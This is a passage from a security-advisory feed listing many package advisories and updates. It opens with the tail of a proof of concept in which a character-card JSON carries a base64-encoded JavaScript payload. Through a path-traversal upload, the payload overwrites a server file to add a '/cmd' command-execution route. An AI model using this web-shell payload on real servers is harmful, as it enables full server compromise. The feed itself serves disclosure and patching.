wb3N0KCcvY21kJywgZ2V0Q21kKTsKZXhwb3J0cy5kZWZhdWx0ID0gcm91dGVyOwovLyMgc291cmNlTWFwcGluZ1VSTD12b2ljZS5qcy5tYXA=","sprite":null,"greeting":"","sampleChat":"","voiceDisabled":false,"voice":{},"systemPrompt":"","postHistoryInstructions":"","insert":{"prompt":"","depth":3},"alternateGreetings":[],"creator":"","characterVersion":"","persona":{"kind":"text","attributes":{"text":[""]}},"imageSettings":{"type":"sd","steps":10,"width":512,"height":512,"prefix":"","suffix":"","negative":"","cfg":9,"summariseChat":true,"summaryPrompt":""}}```### RiskThe attacker can write arbitrary files to disk, including overwriting existing JavaScript to execute arbitrary code on the server, leading to a complete system compromise, server control, and further network penetration.Attackers can gain full access to the server.### RecommendationInput Validation- Ensure thorough validation of user inputs, particularly id parameter, file paths and file names, to prevent directory traversal and ensure they end up in the desired folder location post-normalization. [[OWASP: Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)](https://owasp.org/www-community/attacks/Path_Traversal)Arbitrary File Upload- Restrict the types of files that can be uploaded via a allow-only list.### Credits- @ropwareJB- @noe233	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MPCH-89GM-HM83
27.09.2024 00:11:03	npm	[NPM:GHSA-J827-6RGF-9629] Layui has DOM Clobbering gadgets that leads to Cross-site Scripting (moderate)	### SummaryA DOM Clobbering vulnerability has been discovered in `layui` that can lead to Cross-site Scripting (XSS) on web pages where attacker-controlled HTML elements (e.g., `img` tags with unsanitized `name` attributes) are present.It's worth noting that we’ve identifed similar issues in other popular client-side libraries like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) and Vite ([CVE-2024-45812](https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3)), which might serve as valuable references.### BackgroundsDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code snippet) living in the existing libraries to transform it into executable code. ### ImpactThis vulnerability can lead to cross-site scripting (XSS) on websites that uses `layui` library and allow users to inject certain scriptless HTML tags with improperly sanitized `name` or `id` attributes.### PatchThis problem has been patched in Layui 2.9.17. You can find the official fix announcement at: https://layui.dev/notes/share/security-currentscript.html	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-J827-6RGF-9629
26.09.2024 19:19:18	ubuntu	[USN-7040-1] ConfigObj vulnerability	ConfigObj could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7040-1
26.09.2024 14:58:55	ubuntu	[USN-7039-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7039-1
26.09.2024 14:24:20	ubuntu	[USN-7021-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-3
26.09.2024 13:57:17	ubuntu	[USN-7020-3] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-3
26.09.2024 13:09:27	ubuntu	[USN-7034-2] ca-certificates update	The CA certificates in the ca-certificates package were updated.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7034-2
26.09.2024 21:25:14	maven	[MAVEN:GHSA-2QQ7-FCH2-PHQF] Maven Archetype Plugin: Maven Archetype integration-test may package local settings into the published artifact, possibly containing credentials (low)	Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin.This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0.Users are recommended to upgrade to version 3.3.0, which fixes the issue.Archetype integration testing creates a filecalled ./target/classes/archetype-it/archetype-settings.xmlThis file contains all the content from the users ~/.m2/settings.xml file,which often contains information they do not want to publish. We expect that on many developer machines, this also containscredentials.When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact.If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot) their credentials would be published without them knowing.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2QQ7-FCH2-PHQF
27.09.2024 01:21:19	npm	[NPM:GHSA-HWXP-6QF7-Q3RC] Remote command execution in promptr (high)	A remote command execution (RCE) vulnerability in promptr v6.0.7 allows attackers to execute arbitrary commands via a crafted URL.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HWXP-6QF7-Q3RC
26.09.2024 23:13:52	rubysec	[RUBYSEC:SQLITE-VEC-2024-46488] Heap-based Buffer Overflow in sqlite-vec (critical)	sqlite-vec v0.1.1 was discovered to contain a heap buffer overflowvia the npy_token_next function. This vulnerability allows attackersto cause a Denial of Service (DoS) via a crafted file.Workaround for CVE in release 0.1.3.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:SQLITE-VEC-2024-46488
26.09.2024 15:26:22	rustsec	[RUSTSEC-2024-0375] `atty` is unmaintained	The maintainer of `atty` has [published](https://github.com/softprops/atty/commit/5bfdbe9e48c6ca6a4909e8d5b04f5e843a257e93) an official notice that the crate is no longerunder development, and that users should instead rely on the functionality in the standard library's [`IsTerminal`](https://doc.rust-lang.org/std/io/trait.IsTerminal.html) trait.## Alternative(s)- [std::io::IsTerminal](https://doc.rust-lang.org/stable/std/io/trait.IsTerminal.html) - Stable since Rust 1.70.0 and the recommended replacement per the `atty` maintainer.- [is-terminal](https://crates.io/crates/is-terminal) - Standalone crate supporting Rust older than 1.70.0	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0375
28.09.2024 04:28:14	fedora	[FEDORA-2024-01127974ec] Fedora 40: cups, libcupsfilters, libppd (critical)	Fix for remote vulnerabilities against OpenPrinting cups-filters	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-01127974ec
28.09.2024 04:20:55	fedora	[FEDORA-2024-cf6ab63871] Fedora 39: libcupsfilters, cups, cups-browsed, libppd (critical)	Fix for remote vulnerabilities against OpenPrinting cups-filters	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cf6ab63871
28.09.2024 03:18:15	fedora	[FEDORA-2024-3fc82fed09] Fedora 41: cups, libppd, cups-browsed, libcupsfilters (high)	Fix for remove vulnerabilities against OpenPrinting cups-filters	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3fc82fed09
28.09.2024 03:18:13	fedora	[FEDORA-2024-8008ddbd4e] Fedora 41: chromium (high)	Update to 129.0.6668.70High CVE-2024-9120: Use after free in DawnHigh CVE-2024-9121: Inappropriate implementation in V8High CVE-2024-9122: Type Confusion in V8High CVE-2024-9123: Integer overflow in Skia	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8008ddbd4e
27.09.2024 18:11:57	suse	[SUSE-SU-2024:3483-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3483-1
27.09.2024 16:23:44	suse	[SUSE-SU-2024:3478-1] Security update for quagga (important)	Security update for quagga	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3478-1
27.09.2024 15:35:59	suse	[SUSE-SU-2024:3470-1] Security update for python3 (important)	Security update for python3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3470-1
27.09.2024 13:34:23	suse	[SUSE-SU-2024:3468-1] Security update for the Linux Kernel (Live Patch 1 for SLE 15 SP6) (important)	Security update for the Linux Kernel (Live Patch 1 for SLE 15 SP6)	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3468-1
27.09.2024 13:20:00	suse	[SUSE-SU-2024:3467-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3467-1
27.09.2024 10:24:20	almalinux	[ALSA-2024:7262] osbuild-composer security update (important)	osbuild-composer security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7262
27.09.2024 12:50:28	almalinux	[ALSA-2024:7204] osbuild-composer security update (important)	osbuild-composer security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7204
27.09.2024 10:22:47	almalinux	[ALSA-2024:7260] net-snmp security update (moderate)	net-snmp security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7260
29.09.2024 04:38:21	fedora	[FEDORA-2024-5db248f2a0] Fedora 40: cjson (high)	Update to new upstream version (closes rhbz#2237124)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5db248f2a0
28.09.2024 13:34:18	almalinux	[ALSA-2024:7346] cups-filters security update (important)	cups-filters security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7346
29.09.2024 15:05:10	rubysec	[RUBYSEC:CAMALEON_CMS-75J2-9GMC-M855] Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184) (medium)	A stored cross-site scripting has been found in the image uploadfunctionality that can be used by normal registered users:It is possible to upload a SVG image containing JavaScript and it'salso possible to upload a HTML document when the format parameteris manually changed to [documents][1] or a string of an[unsupported format][2]. If an authenticated user or administratorvisits that uploaded image or document malicious JavaScript can beexecuted on their behalf (e.g. changing or deleting content insideof the CMS.)[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111## ImpactThis issue may lead to account takeover due to reflected Cross-sitescripting (XSS).## RemediationOnly allow the upload of safe files such as PNG, TXT and others orserve all "unsafe" files such as SVG and other files with acontent-disposition: attachment header, which should prevent browsersfrom displaying them.Additionally, a [Content security policy (CSP)][3] can be createdthat disallows inlined script. (Other parts of the application mightneed modification to continue functioning.)[3]: https://web.dev/articles/cspTo prevent the theft of the auth_token it could be marked withHttpOnly. This would however not prevent that actions could beperformed as the authenticated user/administrator. Furthermore, itcould make sense to use the authentication provided by Ruby on Rails,so that stolen tokens cannot be used anymore after some time.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:CAMALEON_CMS-75J2-9GMC-M855
01.10.2024 10:04:10	ubuntu	[USN-7015-3] Python vulnerability	Python could be made to bypass some restrictions if it received speciallycrafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7015-3
01.10.2024 09:53:06	ubuntu	[USN-7047-1] Knot Resolver vulnerabilities	Several security issues were fixed in knot-resolver.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7047-1
30.09.2024 21:14:43	ubuntu	[USN-7046-1] Flatpak and Bubblewrap vulnerability	Flatpak could be made to read and write files in locations itwould not normally have access to.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7046-1
30.09.2024 23:11:41	npm	[NPM:GHSA-7P89-P6HX-Q4FW] basic-auth-connect's callback uses time unsafe string comparison (high)	### Impactbasic-auth-connect <1.1.0 uses a timing-unsafe equality comparison that can leak timing information### Patchesthis issue has been fixed in basic-auth-connect 1.1.0### References	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7P89-P6HX-Q4FW
30.09.2024 17:33:13	rockylinux	[RLSA-2024:6963] gtk3 security update (moderate)	An update is available for gtk3.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6963
30.09.2024 17:33:13	rockylinux	[RLBA-2024:6965] pacemaker bug fix update (none)	An update is available for pacemaker.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6965
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6967] xmlsec1 bug fix update (none)	An update is available for xmlsec1.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6967
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6970] cloud-init bug fix and enhancement update (none)	An update is available for cloud-init.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6970
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6971] edk2 bug fix and enhancement update (none)	An update is available for edk2.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6971
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6972] gnome-keyring bug fix update (none)	An update is available for gnome-keyring.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6972
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6974] libX11 bug fix update (none)	An update is available for libX11.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6974
30.09.2024 17:33:13	rockylinux	[RLSA-2024:6837] pcp security update (important)	An update is available for pcp.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6837
30.09.2024 17:33:13	rockylinux	[RLSA-2024:6961] python3.12 security update (moderate)	An update is available for python3.12.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6961
30.09.2024 17:33:13	rockylinux	[RLSA-2024:6962] python3.11 security update (moderate)	An update is available for python3.11.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6962
30.09.2024 17:33:14	rockylinux	[RLBA-2024:6968] tigervnc bug fix update (none)	An update is available for tigervnc.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6968
30.09.2024 17:33:14	rockylinux	[RLSA-2024:6973] dovecot security update (moderate)	An update is available for dovecot.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6973
30.09.2024 17:33:14	rockylinux	[RLSA-2024:7135] git-lfs security update (important)	An update is available for git-lfs.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:7135
30.09.2024 17:33:14	rockylinux	[RLSA-2024:7262] osbuild-composer security update (important)	An update is available for osbuild-composer.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:7262
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6981] libldb bug fix update (none)	An update is available for libldb.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6981
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6982] blktrace bug fix update (none)	An update is available for blktrace.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6982
30.09.2024 17:33:09	rockylinux	[RLSA-2024:6975] python3 security update (moderate)	An update is available for python3.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6975
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6976] findutils bug fix update (none)	An update is available for findutils.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6976
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6977] systemd bug fix update (none)	An update is available for systemd.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6977
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6980] kexec-tools bug fix update (none)	An update is available for kexec-tools.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6980
30.09.2024 17:33:09	rockylinux	[RLBA-2024:6983] libuser bug fix and enhancement update (none)	An update is available for libuser.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLBA-2024:6983
30.09.2024 17:33:09	rockylinux	[RLSA-2024:6986] nano security update (low)	An update is available for nano.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6986
30.09.2024 17:33:09	rockylinux	[RLSA-2024:6989] expat security update (moderate)	An update is available for expat.This update affects Rocky Linux 8.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list	https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:6989
30.09.2024 17:14:17	suse	[SUSE-SU-2024:3500-1] Security update for openssl-3 (important)	Security update for openssl-3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3500-1
30.09.2024 13:52:07	suse	[SUSE-SU-2024:3499-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3499-1
01.10.2024 00:46:45	maven	[MAVEN:GHSA-G643-XQ6W-R67C] Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator. (moderate)	This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0.The deprecated org.apache.lucene.replicator.http package is affected.The org.apache.lucene.replicator.nrt package is not affected.Users are recommended to upgrade to version 9.12.0, which fixes the issue.Java serialization filters (such as -Djdk.serialFilter='!*' on the commandline) can mitigate the issue on vulnerable versions without impacting functionality.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G643-XQ6W-R67C
30.09.2024 20:13:46	maven	[MAVEN:GHSA-JQ3F-MFMG-747X] Eclipse Glassfish improperly handles http parameters (moderate)	In Eclipse Glassfish versions before 7.0.17, the Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is `/management/domain`. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JQ3F-MFMG-747X
30.09.2024 03:00:00	cisa	[CISA-2024:0930] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0930
30.09.2024 03:00:00	redhat	[RHSA-2024:7349] grafana security update (moderate)	Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB & OpenTSDB. Security Fix(es):* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:7349
30.09.2024 23:56:49	npm	[NPM:GHSA-M5P9-XVXJ-64C8] Flowise and Flowise Chat Embed vulnerable to Stored Cross-site Scripting (moderate)	Flowise < 2.1.1 suffers from a Stored Cross-Site vulnerability due to a lack of input sanitization in Flowise Chat Embed < 2.0.0.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-M5P9-XVXJ-64C8
02.10.2024 04:33:42	fedora	[FEDORA-2024-82f3634c69] Fedora 41: cjson (high)	Update to new upstream version (closes rhbz#2237124)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-82f3634c69
02.10.2024 04:33:41	fedora	[FEDORA-2024-a03b06dbd0] Fedora 41: php (critical)	PHP version 8.3.12 (26 Sep 2024)CGI:Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter InjectionVulnerability). (CVE-2024-8926) (nielsdos)Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassabledue to the environment variable collision). (CVE-2024-8927) (nielsdos)Core:Fixed bug GH-15408 (MSan false-positve on zend_max_execution_timer). (zeriyoshi)Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot)Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot)Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEMnot found). (nielsdos)Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, ThomasPetazzoni)Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud)Fixed uninitialized lineno in constant AST of internal enums. (ilutov)Curl:FIxed bug GH-15547 (curl_multi_select overflow on timeout argument). (DavidCarlier)DOM:Fixed bug GH-15551 (Segmentation fault (access null pointer) inext/dom/xml_common.h). (nielsdos)Fixed bug GH-15654 (Signed integer overflow in ext/dom/nodelist.c). (nielsdos)Fileinfo:Fixed bug GH-15752 (Incorrect error message for finfo_file with an emptyfilename argument). (DanielEScherzer)FPM:Fixed bug GHSA-865w-9rf3-2wh5 (Logs from childrens may be altered).(CVE-2024-9026) (Jakub Zelenka)MySQLnd:Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, KamilTekiela)Opcache:Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c).(nielsdos)Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos)SAPI:Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data).(CVE-2024-8925) (Arnaud)Standard:Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb)Streams:Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a03b06dbd0
01.10.2024 22:05:36	slackware	[SSA:2024-275-03] rpath security issues	Several packages have been updated for Slackware 15.0 and -current to fixrpath security issues.Here are the details from the Slackware 15.0 ChangeLog```Several ELF objects were found to have rpaths pointing into /tmp, a worldwritable directory. This could have allowed a local attacker to launch denialof service attacks or execute arbitrary code when the affected binaries arerun by placing crafted ELF objects in the /tmp rpath location. All rpaths withan embedded /tmp path have been scrubbed from the binaries, and makepkg hasgained a lint feature to detect these so that they won't creep back in.extra/llvm-17.0.6-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. (* Security fix )patches/packages/cryfs-0.10.3-i586-5_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/espeak-ng-1.50-i586-4_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/libvncserver-0.9.13-i586-4_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/marisa-0.2.6-i586-5_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/mlt-7.4.0-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/openobex-1.7.2-i586-6_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )patches/packages/pkgtools-15.0-noarch-44_slack15.0.txz: Rebuilt. makepkg: when looking for ELF objects with --remove-rpaths or --remove-tmp-rpaths, avoid false hits on files containing 'ELF' as part of the directory or filename. Also warn about /tmp rpaths after the package is built.patches/packages/spirv-llvm-translator-13.0.0-i586-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )testing/packages/llvm-18.1.8-i686-2_slack15.0.txz: Rebuilt. Remove rpaths from binaries. ( Security fix )```Installation instructions*Upgrade the packages using upgradepkg or slackpkg.	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-03
01.10.2024 22:05:19	slackware	[SSA:2024-275-02] mozilla-firefox	New mozilla-firefox packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz: Upgraded. This update contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/firefox/115.16.0/releasenotes/ https://www.mozilla.org/security/advisories/mfsa2024-48 https://www.cve.org/CVERecord?id=CVE-2024-9392 https://www.cve.org/CVERecord?id=CVE-2024-9393 https://www.cve.org/CVERecord?id=CVE-2024-9394 https://www.cve.org/CVERecord?id=CVE-2024-9401 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.16.0esr-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.16.0esr-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.3.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.3.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:8f81f39a0345c80c5d3abbb65db4586c mozilla-firefox-115.16.0esr-i686-1_slack15.0.txzSlackware x86_64 15.0 package:fdf2153143e65c8d599e01b226317457 mozilla-firefox-115.16.0esr-x86_64-1_slack15.0.txzSlackware -current package:492342bfdf0951e127a62efa3fc33d66 xap/mozilla-firefox-128.3.0esr-i686-1.txzSlackware x86_64 -current package:521af09cb4f16b345a003cce028bf689 xap/mozilla-firefox-128.3.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-firefox-115.16.0esr-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-02
01.10.2024 22:04:59	slackware	[SSA:2024-275-01] cups-filters/cups-browsed	New cups-filters (Slackware 15.0) and cups-browsed (Slackware -current)packages are available to fix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/cups-filters-1.28.17-i586-2_slack15.0.txz: Rebuilt. Mitigate security issue that could lead to a denial of service or the execution of arbitrary code. Rebuilt with --with-browseremoteprotocols=none to disable incoming connections, since this daemon has been shown to be insecure. If you actually use cups-browsed, be sure to install the new /etc/cups/cups-browsed.conf.new containing this line: BrowseRemoteProtocols none For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-47176 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/cups-filters-1.28.17-i586-2_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/cups-filters-1.28.17-x86_64-2_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/cups-browsed-2.0.1-i686-2.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/cups-browsed-2.0.1-x86_64-2.txzMD5 signaturesSlackware 15.0 package:e0a64ab06dee885bff6f1abe3030d5e5 cups-filters-1.28.17-i586-2_slack15.0.txzSlackware x86_64 15.0 package:feb795ef30a6b083f86fbaa4b2496c86 cups-filters-1.28.17-x86_64-2_slack15.0.txzSlackware -current package:34c5b2e590b67bd7116808308ec736e6 ap/cups-browsed-2.0.1-i686-2.txzSlackware x86_64 -current package:788dd278e60096097a661e0fad264234 ap/cups-browsed-2.0.1-x86_64-2.txzInstallation instructions*Upgrade the package as root:`# upgradepkg cups-filters-1.28.17-i586-2_slack15.0.txz`If you use cups-browsed, be sure that your /etc/cups/cups-browsed.conf containsthis line:BrowseRemoteProtocols none	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-275-01
